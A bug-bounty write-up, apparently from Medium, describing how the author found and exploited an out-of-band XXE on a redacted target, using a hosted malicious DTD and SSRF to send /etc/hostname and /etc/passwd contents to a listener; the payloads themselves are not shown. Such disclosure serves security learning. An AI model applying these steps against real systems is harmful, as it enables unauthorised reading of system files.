Exploiting Out-of-Band XXE in the Wild

Phase 1 → Recon:

I like shodan and enumerate IPs from it, so I collected a list of IPs that related to my target which we’ll call it redacted.com and after that, I made a full port scan with rustscan (you can use naabu or whatever you want) then I made an HTTP probe to them and started to check the unusual ports such as 8443, 8080, 8888, 9180, 9000, etc. and sure I passed all the requests to burp then I came across an IP with port 9180 open, this IP uses some xmlcontent so I tried to make a POST request with Content-Type: application/xml then I got some errors! In this stage, I decided to test XXE, which you can read about and practice here, so Let’s try to exploit it!

Phase 2 → Analysis:

I tried the payload that was used to detect the vulnerability, but the response contains only errors, so I tried to retrieve local files directly, so I used the classic payload:

Phase 3 → SSRF:

So, I thought that I can’t get P1 from this, then I tried to perform an HTTP request to my burp collab (SSRF), so I fire the burp again and tried the payload to perform SSRF from the XXE, so I tried this payload:

Filter responses that contain Connection refused

Phase 4 → OOB XXE:

And for now, I thought it’s time to test Out-of-band XXE because I could make SSRF, so if I hosted a malicious DTD file and did SSRF, forcing the site to request my malicious DTD file, may I could achieve the XXE, btw I told myself that this is the final try to get this XXE. But before the exploitation, you need to understand what is OOB XXE and how it works.

  1. The site requested our malicious DTD file
  2. Our malicious DTD requests /etc/hostname file and send it to my IP on 1337 port
  3. my listener should receive a request with the /etc/hostname file content

Phase 5 → XXE Final Exploitation:

In this stage, I started to do what I know in OOB XXE attacks to get large file contents such as base64, FTP or even using some tools that were used to get the data through FTP, but I failed in all these ways :( But it is still something to try which is getting large file contents via error messages, But how it will happen?

  1. Hosted a malicious DTD file does two things:
  • has a defined XML parameter entity containing the content of the /etc/passwd file.
  • has a defined XML parameter entity containing a dynamic declaration of another XML parameter entity, and this will be evaluated by loading a nonexistent file whose name contains the pre-defined entity that we defined above, which in his turn getting /etc/passwd content.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mahmoud Youssef

Mahmoud Youssef

Cyber Security Researcher | Bug Hunter